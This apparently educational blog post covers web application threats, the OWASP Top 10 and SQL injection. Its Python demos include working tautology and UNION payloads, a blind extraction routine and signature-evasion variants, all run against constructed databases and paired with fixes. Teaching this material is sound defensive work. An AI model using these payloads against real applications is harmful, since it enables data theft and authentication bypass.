Web Application Threats and Security
Volume-1
- Web App Concepts
- Web App Threats
- Web App Hacking Methodology
Web App Concepts
Web applications run on a remote application server and are reached by clients over the Internet, usually through a browser but also through native or mobile apps that call the same back end. Their use has grown enormously in the last few years.
They depend on a client-server relationship and provide an interface through which clients consume web services. Pages may be generated on the server, or may carry scripts that run dynamically in the client's browser; anything that runs on the client is under the user's control, not the application's.
Web App Threats
Threats to web applications include:
- Cookie Poisoning
- Insecure Storage
- Information Leakage
- Directory Traversal
- Parameter/Form Tampering
- DoS Attack
- Buffer Overflow
- Log Tampering
- SQL Injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Security Misconfiguration
- Broken Session Management
- DMZ Attacks
- Session Hijacking
- Network Access Attacks
Unvalidated Inputs
Unvalidated input means the web application or back-end server processes data from the client without checking it first. Such input is the root of XSS, buffer overflow, and injection attacks: the attacker controls exactly what reaches the interpreter.
Parameter/Form Tampering
Parameter tampering is an attack in which the attacker modifies the parameters exchanged between client and server: URL query strings, hidden and visible form fields, cookies, and HTTP headers. Because the application trusts values it received from the client (a price, a user id, a role flag), changing them can alter business logic, grant access to another user's data, or redirect the user to a look-alike site controlled by the attacker.
Injection Flaws
Injection attacks work because of web application vulnerabilities: if untrusted input is concatenated into a query or command that an interpreter then executes, the following injection attacks can be performed:
- SQL Injection
- Command Injection
- LDAP Injection
SQL Injection
SQL injection is the insertion of attacker-controlled SQL into a query that the application builds from user input. With it, an unauthorized user can read, modify, or delete data, bypass authentication, and on some database servers execute operating-system commands, resulting in data leakage or loss. These vulnerabilities can be detected by application vulnerability scanners and by reviewing every place in the code where a query is assembled from strings. An injection is often delivered through a URL parameter typed into the address bar, but any input that reaches the query (form fields, cookies, HTTP headers) works equally well.
OWASP Top 10 Application Security Risk
The OWASP Top 10 is an awareness document listing the most critical web application security risks. It is the best way to start transforming an organization's software development culture toward one that produces more secure code, but it is a starting point, not a complete standard: minimizing these ten risks does not make an application secure.
Broken access control
Access control limits what users can do, restricting them to the resources and functions within their assigned permissions. Access control failures typically let a user act outside those permissions: viewing or editing another user's records, reaching an administrative function, or elevating their own privileges. The result is unauthorized information disclosure, modification, or destruction of data.
Cryptographic failures
Cryptographic failures are a broad symptom of a breakdown or deficiency in cryptography, which can lead to system compromise or sensitive data exposure. Personally identifiable data and credit card numbers are among the data types that require extra protection. Data protection methods are determined by the type of data and whether or not it is subject to data privacy laws such as the EU General Data Protection Regulation (GDPR).
Injection
Injection vulnerabilities can be detected through source-code review, and automated testing helps by making sure every parameter, header, cookie, and data input is exercised. Since the 2021 revision this category also includes cross-site scripting alongside SQL, OS command, LDAP, and XML injection, among others.
Applications are vulnerable to injection when:
- User-supplied data is accepted without validation, filtering, or sanitization.
- Hostile data is used directly in, or concatenated into, dynamic queries, commands, or ORM search parameters, so the interpreter executes it as code instead of treating it as data.
Insecure design
Insecure design differs from insecure implementation. A secure design can be implemented imperfectly, resulting in vulnerabilities. Insecure design can’t be fixed through implementation since the design itself doesn’t contain appropriate security controls. A failure to accurately assess business risk associated with the software or system under development leads to insufficient levels of security.
Security misconfiguration
Security misconfigurations arise from an array of inappropriately configured controls and other factors that leave the application exposed. Common examples include:
- Misconfigured permissions for cloud services.
- Unnecessary features enabled, leaving ports open, services running, or privileges elevated that nobody needs.
- Default account credentials left unchanged.
- Verbose error messages that reveal stack traces or other internal details to users.
Vulnerable and outdated components
Unpatched and legacy components that remain in production well after their vulnerabilities are disclosed are a major risk. An application can be vulnerable when it runs outdated or unsupported versions of the server, framework, or libraries, when nobody knows which library or component version is actually deployed, or when components are never scanned for known vulnerabilities.
Identification and authentication failures
Identification and authentication failures happen when user identity, authentication, and session state are not properly confirmed before the user is permitted to access systems and data. Factors that put an application at risk include allowing weak passwords; storing passwords in plain text or with weak hashing; and not limiting automated attacks such as brute-force and credential stuffing.
Software and data integrity failures
New in the 2021 list, this category covers code and infrastructure that do not protect against integrity violations: trusting software updates, plugins, or serialized data without verifying their integrity. Attackers have used the software supply chain to deliver malware through seemingly legitimate updates, and many automatic update mechanisms apply whatever they download without checking a signature.
Security logging and monitoring failures
This category covers gaps in audit logging and monitoring that let an attack go unnoticed while it is happening. Logs and monitoring are what make it possible to detect and contain an active breach. Failures happen when:
- High-value transactions, logins, and failed login attempts are not logged.
- Errors and warnings generate unclear, inadequate, or no log entries.
- APIs and applications are not monitored for suspicious activity.
- Logs are stored only locally, where an attacker on the host can read or erase them.
- The application cannot detect, escalate, or alert on an attack in progress in a timely way.
Server-side request forgery (SSRF)
SSRF flaws occur when a web application fetches a remote resource from a user-supplied URL without validating the destination. Because the request originates from the server, the attacker can make it reach internal hosts, cloud metadata endpoints, or other systems that are only reachable from the server's network position, even behind a firewall or VPN, and often read the response.
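As an added example (not part of the original post), here is the destination check a server-side fetch should perform before following a user-supplied URL: restrict scheme and port, resolve the host, and reject any address that is not globally routable. The FAKE_DNS table and the hostnames in it are constructed so the code runs offline; a real deployment resolves with socket.getaddrinfo and checks every address it returns.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}

# Constructed stand-in for DNS so the example runs offline. A real resolver
# (socket.getaddrinfo) returns a list of addresses; every one must be checked.
FAKE_DNS = {
    "www.example.com": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example.net": ["93.184.216.34", "10.0.0.5"],
}


def fake_resolve(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise ValueError(f"cannot resolve {host}") from None


def is_public(ip_text):
    """True only for globally routable unicast addresses: no RFC 1918, loopback,
    link-local (cloud metadata lives at 169.254.169.254), multicast, or
    IPv4-mapped IPv6 wrappers around any of those."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # ::ffff:10.0.0.5 is really 10.0.0.5
    return addr.is_global and not addr.is_multicast


def validate_fetch_url(url, resolver=fake_resolve):
    """Return (ok, reason). ok is True only if scheme, port and every resolved
    address of the host are acceptable for a server-side fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        ipaddress.ip_address(host)
        addresses = [host]               # literal IP, nothing to resolve
    except ValueError:
        try:
            addresses = resolver(host)
        except ValueError as exc:
            return False, str(exc)
    for ip_text in addresses:
        if not is_public(ip_text):
            return False, f"{host} resolves to non-public address {ip_text}"
    return True, "ok"
```

The check and the fetch must use the same resolution: a host that resolves to a public address during validation and a private one a moment later (DNS rebinding) slips through if the HTTP client resolves again on its own, so connect to the validated IP and send the original Host header. Redirect targets have to go through the same function before they are followed.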
Web App Hacking Methodology
Footprint Web Infrastructure
Footprinting the web application's infrastructure discovers information, vulnerabilities, and entry points in the target. Techniques include:
- Collecting Server related information (version, make, model, etc.)
- Services Footprinting (running services, vulnerable services, ports)
- Network Footprinting (open, closed, and filtered ports)
Analyze Web Applications
Analyzing the web application means observing its functionality and parameters to identify vulnerabilities, entry points, and the server technologies in use. Crafted HTTP requests and HTTP fingerprinting techniques are used to work these out.
By-pass Client-side Control
Web security becomes harder when an application accepts arbitrary input from clients. Some applications rely partly or entirely on client-side controls (hidden fields, disabled buttons, JavaScript validation) to constrain that input. This is a flaw because the user has full control over the client and everything it submits: any control that is not replicated on the server side can be bypassed with an intercepting proxy or by editing the request. Techniques to bypass client-side controls include:
- Bypass hidden form fields
- Bypass client-side JavaScript validation
- Parameter manipulation
- Forced browsing
Attack Authentication Mechanism
By attacking the authentication mechanism with various techniques, an attacker may bypass authentication or steal credentials. Attacks on the authentication mechanism include:
- Username Enumeration
- Cookie Exploitation
- Session Attacks
- Password Attacks
Authorization Attack Schemes
Starting from a low-privilege account, an attacker tries to escalate privileges and reach sensitive information by tampering with whatever the application uses to decide authorization: URL paths, POST data, query-string values, cookies, other parameters, and HTTP headers.
Attack Access Control
A web application uses an access control mechanism to authorize its users to reach the content, resources, and functions it publishes. Attacks on it test whether every check is enforced server-side on every request: whether a resource identifier can be changed to another user's (horizontal escalation) and whether administrative functions are reachable by ordinary users (vertical escalation).
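Added example, not from the original page, covering both the client-side control bypass above (a hidden price field) and the access control check in this section (an invoice id parameter): each trusting handler is shown next to a version that re-derives the trusted value on the server. CATALOG, INVOICES and the field names are constructed for the demo.

```python
# Constructed server-side data standing in for a product catalog and an
# invoice table; prices are in cents.
CATALOG = {"sku-100": 2500, "sku-200": 999}
INVOICES = {
    "inv-1": {"owner": "alice", "total": 2500},
    "inv-2": {"owner": "bob", "total": 999},
}


class Forbidden(Exception):
    pass


def vulnerable_checkout(form):
    """Trusts the hidden 'price' field exactly as the browser submitted it."""
    return int(form["price"]) * int(form["qty"])


def checkout(form):
    """The client may only choose what and how many; the price comes from the
    catalog, and the quantity is range-checked before it is used."""
    sku = form.get("sku")
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity is not an integer") from None
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOG[sku] * qty


def vulnerable_get_invoice(session_user, params):
    """Authenticated, but not authorized: any logged-in user can read any
    invoice by editing ?id= in the URL."""
    return INVOICES[params["id"]]


def get_invoice(session_user, params):
    """Object-level check: the record must belong to the session's user."""
    invoice = INVOICES.get(params.get("id"))
    if invoice is None or invoice["owner"] != session_user:
        # One response for "missing" and "not yours", so the endpoint cannot
        # be used to enumerate which ids exist.
        raise Forbidden("no such invoice")
    return invoice
```

The pattern is the same in both halves: the client supplies a selector (a SKU, an invoice id), never a fact (a price, an owner), and the server looks the fact up in data it controls.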
Session Management Attack
A session management attack obtains or forges a valid session token so the attacker can impersonate a legitimate, already-authenticated user without going through authentication. Session hijacking techniques include:
- Session Token Prediction
- Session Token Tampering
- Man-in-the-Middle Attack
- Session Replay
Perform Injection Attacks
An injection attack is the injection of malicious code, commands, or files by exploiting vulnerabilities in a web application. It may take different forms, such as:
- Web Script Injection
- OS Command Injection
- SMTP Injection
- SQL Injection
- LDAP Injection
- XPath Injection
- Buffer Overflow
- Canonicalization
Attack Database Connectivity
A Database Connectivity Attack focuses on exploiting the data connectivity between an application and its database. Initiating a connection to the database requires a connection string. A data connectivity attack includes:
- Connection String Injection
- Connection String Parameters Pollution (CSPP)
- Connection Pool DoS
Attack Web Client
Web clients are the browsers on users' machines that render pages fetched from the application server; the term also covers thin clients, which execute little logic locally because the work is offloaded to the server. Attacks here target the browser itself, or the user behind it, rather than the server.
Attack Web Services
An application server exposes web services that an application depends on to load, execute, and function. These services and the protocols behind them (SOAP, WSDL, UDDI, and others) have their own vulnerabilities that an attacker can target.
Web APIs
A web Application Programming Interface (API) is the intermediary component through which a web application communicates with other applications, services, and platforms; APIs are typically used to access, extract, and share data. SOAP and REST are the popular API styles used in web applications.
Webhooks & Web Shell
Webhooks are user-defined HTTP callbacks triggered by an event. Unlike a typical API, which the consumer polls for data, the producing system sends an HTTP POST to a URL the consumer registered whenever the event occurs. Because that receiving endpoint is reachable from the Internet, incoming webhook requests must be authenticated (typically with an HMAC signature over a timestamp and the raw body) so that forged, tampered, or replayed payloads are not ingested.
A web shell is a script an attacker manages to place on a web server (for example through an unrestricted file upload) that lets them execute commands on the server through ordinary HTTP requests.
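Added example, not the page's own code: a minimal signing and verification scheme for webhook deliveries. The header names and the secret are assumptions for the demo; real providers document their own header names and encoding, but the shape (HMAC over timestamp plus raw body, constant-time comparison, freshness window) is the same.

```python
import hashlib
import hmac
import json
import time

# Constructed shared secret for the example; a real one comes from the
# provider and lives in a secrets store, not in source.
WEBHOOK_SECRET = b"constructed-example-secret"
MAX_SKEW_SECONDS = 300                 # reject deliveries older than 5 minutes
SIG_HEADER = "X-Webhook-Signature"     # assumed header names; providers vary
TS_HEADER = "X-Webhook-Timestamp"


def sign(secret, timestamp, body):
    """Producer side: MAC over timestamp and raw body together, so a captured
    signature cannot be paired with a different body or a fresh timestamp."""
    msg = str(timestamp).encode() + b"." + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def build_delivery(secret, event, now):
    """What the producing system sends: raw bytes plus the two headers."""
    body = json.dumps(event, separators=(",", ":")).encode()
    headers = {TS_HEADER: str(now), SIG_HEADER: sign(secret, now, body)}
    return headers, body


def verify_delivery(secret, headers, body, now=None):
    """Consumer side. Returns the parsed event on success, None otherwise.
    Verify over the raw bytes before parsing; re-serialised JSON may differ."""
    now = time.time() if now is None else now
    try:
        ts = int(headers[TS_HEADER])
    except (KeyError, ValueError):
        return None
    if abs(now - ts) > MAX_SKEW_SECONDS:
        return None                    # stale: replayed or clock trouble
    expected = sign(secret, ts, body)
    provided = headers.get(SIG_HEADER, "")
    if not hmac.compare_digest(expected, provided):
        return None                    # constant-time compare, no early exit
    return json.loads(body)
```

The freshness window limits replay but does not eliminate it within those five minutes; a consumer that must process each delivery exactly once also records delivery ids it has already seen.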
Volume-2
Lesson Objectives:
- SQL Injection Concepts
- Types of SQL Injection
- SQL Injection Methodology
- SQL Injection Tools
- Evasion Techniques
- SQL Injection Countermeasures
SQL Injection Concepts
A SQL injection attack targets websites and web applications that build SQL queries from user input. It relies on inserting attacker-crafted SQL into an existing query so that the database executes it; the injected SQL is written to reveal or manipulate data stored in the database tables. SQL injection is a powerful and dangerous attack: once an injection point is found it can be used to read sensitive data, alter or delete it, bypass authentication, and in some configurations run commands on the database host, so it frequently leads to a high-profile breach.
Types of SQL Injection
SQL Injections can be classified into three major categories:
- In-band SQLi
- Inferential SQLi
- Out-of-band SQLi
In-band SQL Injection
In-band SQL Injection includes injection techniques that use the same communication channel to launch an injection attack and to gather information from the response. In-band injection techniques include:
- Error-based SQL Injection: an in-band technique that relies on error messages returned by the database server to reveal information about the structure of the database, which makes it very useful for enumerating an entire database. Detailed error messages are meant for troubleshooting during development and should be replaced by generic errors once the application is live. Error-based SQL injection can be performed using the following techniques:
- System Stored Procedure
- End of Line Comment
- Illegal/Logically incorrect Query
- Tautology
- Union-based SQL Injection: another in-band technique that uses the UNION SQL operator to append the results of an attacker-chosen SELECT (with the same number of columns as the original query) to the results of the application's own query, so the stolen data is rendered in the normal page.
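Added example illustrating both in-band techniques above, the SQL injection overview in Volume 1, and the parameterized-query fix from the countermeasures (example code, not the blog's own). It uses Python's built-in sqlite3 with a constructed in-memory database; the tables, users, and API key values are made up.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory database. Passwords are stored in clear only to
    keep the demo short; a real application stores salted hashes."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('alice', 's3cret', 'admin'), ('bob', 'hunter2', 'user');
        CREATE TABLE api_keys(id INTEGER PRIMARY KEY, owner TEXT, api_key TEXT);
        INSERT INTO api_keys(owner, api_key) VALUES
            ('alice', 'AK-constructed-0001'), ('bob', 'AK-constructed-0002');
    """)
    return con


def vulnerable_login(con, username, password):
    """Builds the query by string formatting: the input becomes part of the SQL."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def safe_login(con, username, password):
    """Parameterised query: the driver sends values separately from the SQL
    text, so quotes and keywords in the input are data, never syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


# Payloads for the two in-band techniques.
TAUTOLOGY = "alice' --"      # end-of-line comment removes the password check
UNION = "x' UNION SELECT owner, api_key FROM api_keys --"   # two columns, like the original SELECT


def demo():
    """Runs each payload against both handlers and returns the rows each produced."""
    con = build_demo_db()
    return {
        "bypass": vulnerable_login(con, TAUTOLOGY, "wrong"),
        "dumped_keys": sorted(vulnerable_login(con, UNION, "wrong")),
        "safe_bypass": safe_login(con, TAUTOLOGY, "wrong"),
        "safe_union": safe_login(con, UNION, "wrong"),
        "safe_real": safe_login(con, "alice", "s3cret"),
    }
```

The UNION payload only works because it supplies the same number of columns as the original SELECT; finding that count (and which columns are rendered) is the first step of a real union-based attack, usually done with ORDER BY n or UNION SELECT NULL,NULL,... probes.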
Inferential SQL Injection (Blind Injection)
In an inferential SQL injection the application returns no database data directly in the response. These are called blind injections because the attacker cannot see the result of a query; they infer it by observing the server's behavior. The two types of inferential SQL injection are:
- Boolean-based Blind SQL Injection
- Time-based Blind SQL Injection.
Boolean Exploitation Technique. In a boolean-based blind injection the attacker appends a condition to the query so that the page behaves one way when the condition is true and another when it is false (a row is shown or not, a 200 versus a 404). The response contains no database data, but by asking a series of true/false questions (is the first character of the password greater than 'm'?) and observing the HTTP response each time, the attacker reconstructs the data a character at a time. Time-based blind injection works the same way when the page content does not differ: a deliberate database delay (a sleep function) is the signal instead of the page content.
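Added example, not from the original post: a boolean-based blind extraction against a constructed sqlite3 endpoint that reveals only whether a product exists. The table names and the secret value are made up for the demo, and the hardened endpoint shows the fix.

```python
import sqlite3


def build_shop_db():
    """Constructed in-memory database: one public table the page queries and
    one table the attacker wants to read."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        CREATE TABLE admins(name TEXT, secret TEXT);
        INSERT INTO admins VALUES ('root', 'tOpSecret!');
    """)
    return con


def product_exists(con, id_param):
    """Stand-in for a page that answers 200 when the product exists and 404
    otherwise. The numeric parameter is interpolated unquoted into the SQL."""
    sql = f"SELECT 1 FROM products WHERE id = {id_param}"
    return con.execute(sql).fetchone() is not None


def product_exists_safe(con, id_param):
    """Hardened version: parse as an integer first, then bind it."""
    product_id = int(id_param)       # raises ValueError on any injection attempt
    row = con.execute("SELECT 1 FROM products WHERE id = ?", (product_id,)).fetchone()
    return row is not None


class BlindOracle:
    """Wraps the vulnerable page so each question is one request, and counts them."""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # id=1 exists, so the response is True exactly when `condition` is true
        return product_exists(self.con, f"1 AND ({condition})")


SECRET_EXPR = "(SELECT secret FROM admins LIMIT 1)"


def extract_secret(oracle, max_len=64):
    """Recovers the secret one character at a time with a binary search over
    the ASCII range: 7 yes/no requests per character instead of up to 128."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"LENGTH({SECRET_EXPR}) >= {pos}"):
            break                    # ran past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"UNICODE(SUBSTR({SECRET_EXPR}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result
```

Every question costs one HTTP request, so the binary search matters: 8 requests per character here, which is what tools such as sqlmap automate. SQLite has no sleep function; on a database that does (MySQL's SLEEP(), for instance) the time-based variant replaces the true/false page check in BlindOracle.ask with a response-time measurement and leaves extract_secret unchanged.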
Out-of-band SQL Injection
Out-of-band SQL Injection is a technique that uses different channels to launch the injection and to gather the response. It requires some features to be enabled, for example, DNS or HTTP requests on the database server; hence, it is not very common.
SQL Injection Methodology
Information Gathering and SQL Injection Vulnerability Detection
In the Information Gathering phase, information about the web application, Operating System, database, and the structure of the components is collected. Evaluation of the extracted information is useful for identifying vulnerabilities that can be exploited.
Launch SQL Injection Attacks
Once the structure of the database and the injection points are known, an appropriate SQL injection attack can be launched; the injection succeeds by exploiting the vulnerabilities found in the previous phase.
How can SQL Injection be Prevented?
Open Worldwide Application Security Project (OWASP) SQL Injection Prevention Cheat Sheet
- Use input validation
- Use a Web Application Firewall (WAF) as defense in depth, not as the primary fix
- Use parameterized queries (prepared statements) for every query that includes user input
- Use an allow-list instead of a block-list
- Sanitize and encode user-provided inputs
Evasion Techniques
It is recommended that the database is deployed in an isolated, secure network segment monitored by an Intrusion Detection System (IDS), which continually inspects network and host traffic to the database. To reach the database, the attacker therefore has to evade the IDS, typically by rewriting the payload so that it no longer matches the signatures while remaining valid SQL.
Types of signature evasion techniques:
- Inserting Inline Comments between Keywords
- Character Encoding
- String Concatenating
- Obfuscating Codes
- Manipulating White Spaces
- Hex Encoding
- Sophisticated Matches
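Added example, not from the original page: several of the evasions listed above applied to one UNION payload, first against a naive literal-string signature and then against a detector that normalizes the request before matching. The payloads and the benign sentence are constructed.

```python
import re
from urllib.parse import unquote_plus

# The signature a simplistic IDS/WAF rule might use: the literal keyword pair.
NAIVE_PATTERN = "UNION SELECT"
# Rule applied after normalisation; also tolerates UNION ALL SELECT.
UNION_RULE = re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b")


def naive_detect(payload):
    return NAIVE_PATTERN in payload


def normalize(payload, max_decode_rounds=3):
    """Undo the transformations an attacker applies to dodge a string match."""
    s = payload
    for _ in range(max_decode_rounds):      # nested %-encoding: %2520 -> %20 -> space
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL version comment keeps its body
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)            # ordinary inline comment acts as whitespace
    s = re.sub(r"\s+", " ", s)                              # tabs, newlines, runs of spaces -> one space
    return s.upper()                                        # keyword case is irrelevant to SQL


def detect(payload):
    return bool(UNION_RULE.search(normalize(payload)))


# Constructed payloads: the plain attack, then the same attack rewritten with
# the evasion techniques listed above.
PLAIN = "1' UNION SELECT username, password FROM users--"
EVASIONS = {
    "mixed case":      "1' uNiOn sElEcT username, password FROM users--",
    "inline comment":  "1' UNION/**/SELECT username, password FROM users--",
    "version comment": "1' UNION/*!50000ALL*/SELECT username, password FROM users--",
    "whitespace":      "1'\tUNION\n\tSELECT username, password FROM users--",
    "url encoding":    "1'%20UNION%20SELECT%20username,%20password%20FROM%20users--",
    "double encoding": "1'%2520UNION%2520SELECT%2520username,%2520password%2520FROM%2520users--",
    "plus as space":   "1'+UNION+SELECT+username,+password+FROM+users--",
}
BENIGN = "please select the union branch nearest to you"


def evaluate():
    """Which payloads each detector catches, plus a false-positive check."""
    return {
        "naive": {name: naive_detect(p) for name, p in EVASIONS.items()},
        "normalized": {name: detect(p) for name, p in EVASIONS.items()},
        "benign_flagged": detect(BENIGN),
    }
```

Normalization closes the listed gaps but not the category: an attacker can use syntax the normalizer does not model (database-specific comment forms, alternative keywords and operators, second-order injection through stored data), which is why signature matching belongs in front of parameterized queries, never instead of them.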
Countermeasures
Several detection tools are available to find SQL injection flaws: they test websites and applications, report the findings, and in some cases take remediation action; the more advanced ones also provide a technical description of each issue. Detection is not the same as mitigation, so the countermeasures below still apply.
Other SQL Injection Countermeasures
- Limit the length of user input
- Use custom, generic error messages so database errors never reach the client
- Monitor database traffic with an IDS or WAF
- Disable dangerous commands such as xp_cmdshell
- Isolate the database server from the web server
- Use POST rather than GET for sensitive parameters (this keeps them out of URLs and logs; it does not prevent injection by itself)
- Connect to the database with a low-privileged account
- Run the database service account with minimal rights
- Move extended stored procedures to an isolated server
- Use type-safe variables or functions such as IsNumeric to ensure type safety
- Validate and sanitize all user input passed to the database
SQL Injection Tools
- BSQL
- SQLmap
- SQLninja
- BSQL Hacker
- Marathon Tool
- SQL Power Injector
- Havij
Feel free to give your suggestions on what I should add ...
Thank you for your insights into looking for something interesting from a web development security perspective 😊 I think you want something more.. 👀 So don't worry, I will come back soon with an amazing and interesting topic.